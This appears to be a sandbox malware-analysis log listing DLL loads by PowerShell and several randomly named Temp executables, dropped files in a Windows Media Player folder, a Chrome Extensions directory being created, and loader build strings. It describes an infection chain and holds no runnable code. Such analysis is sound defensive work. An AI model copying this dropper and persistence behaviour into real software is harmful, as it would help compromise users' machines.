Source: C:\Windows\explorer.exe	Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe	Section loaded: napinsp.dll
Source: C:\Windows\explorer.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\explorer.exe	Section loaded: wshbth.dll
Source: C:\Windows\explorer.exe	Section loaded: nlaapi.dll
Source: C:\Windows\explorer.exe	Section loaded: winrnr.dll
Source: C:\Windows\explorer.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\explorer.exe	Section loaded: explorerframe.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Section loaded: samlib.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exe	Section loaded: samlib.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: apphelp.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: edgegdi.dll
Source: C:\Program Files\Windows Media Player\graph\graph.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: taskschd.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exe	Section loaded: mskeyprotect.dll

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Google\Chrome\Extensions
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\graph
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\graph\graph.exe
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f
Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exe	Directory created: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5fzip

Source: file.exe

Static file information: File size 3028480 > 1048576

Source: file.exe

Static PE information: Raw size of syfpipoa is bigger than: 0x100000 < 0x2b1c00

Source:	Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_asyncio.pdb source: LoaderClient.exe, 0000002E.00000003.269781086691.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: LoaderClient.exe, 0000002E.00000003.269782910984.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: LoaderClient.exe, 0000002F.00000002.269889838631.00007FFBB35E2000.00000002.00000001.01000000.00000042.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_multiprocessing.pdb source: LoaderClient.exe, 0000002E.00000003.269783180111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\select.pdb source: LoaderClient.exe, 0000002E.00000003.269799420971.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269901766931.00007FFBE1BC3000.00000002.00000001.01000000.0000001D.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win-amd64-3.10\Release\win32trace.pdb source: LoaderClient.exe, 0000002E.00000003.269801841133.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb% source: dwVrTdy.exe, 00000026.00000003.269623319835.0000022434342000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648198814.00000256362AF000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000002A.00000002.269645091434.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002A.00000000.269623648243.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002C.00000000.269648966759.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.269753453267.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: LoaderClient.exe, 0000002E.00000003.269800856606.0000023A40630000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269890200730.00007FFBB373C000.00000002.00000001.01000000.00000040.sdmp
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: D:\exe\final\merged_final\x64\Release\fetcher2.pdb[ source: dwVrTdy.exe, 00000026.00000000.269552412414.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000026.00000002.269642733373.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000002.269666668507.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, dwVrTdy.exe, 00000028.00000000.269569842082.00007FF636ED0000.00000002.00000001.01000000.00000011.sdmp, AzVRM7c.exe, 00000029.00000002.269642585095.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, AzVRM7c.exe, 00000029.00000000.269596958142.00007FF6BD660000.00000002.00000001.01000000.00000012.sdmp, t5abhIx.exe, 0000002B.00000000.269642377943.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp, t5abhIx.exe, 0000002B.00000002.269685675962.00007FF67D540000.00000002.00000001.01000000.00000014.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: LoaderClient.exe, 0000002E.00000003.269784461654.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: LoaderClient.exe, 0000002F.00000002.269891937465.00007FFBB399F000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\python3.pdb source: LoaderClient.exe, 0000002E.00000003.269792403014.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269878316296.00000178E9C30000.00000002.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: LoaderClient.exe, 0000002E.00000003.269780776101.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\src\pywin32\build\temp.win-amd64-3.10\Release\_win32sysloader.pdb source: LoaderClient.exe, 0000002E.00000003.269785646619.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: LoaderClient.exe, 0000002E.00000003.269784263111.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_overlapped.pdb source: LoaderClient.exe, 0000002E.00000003.269783360100.0000023A40628000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: LoaderClient.exe, 0000002E.00000003.269781338858.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269900030970.00007FFBE131D000.00000002.00000001.01000000.0000001F.sdmp
Source:	Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: LoaderClient.exe, 0000002E.00000003.269782686037.0000023A40628000.00000004.00000020.00020000.00000000.sdmp, LoaderClient.exe, 0000002F.00000002.269899355718.00007FFBE12F6000.00000002.00000001.01000000.00000025.sdmp
Source:	Binary string: D:\exe\final\final\graph\x64\Release\graph.pdb source: dwVrTdy.exe, 00000026.00000003.269623319835.0000022434342000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000028.00000003.269648198814.00000256362AF000.00000004.00000020.00020000.00000000.sdmp, graph.exe, 0000002A.00000002.269645091434.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002A.00000000.269623648243.00007FF70FBE9000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002C.00000000.269648966759.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp, graph.exe, 0000002D.00000000.269753453267.00007FF734C79000.00000002.00000001.01000000.00000013.sdmp
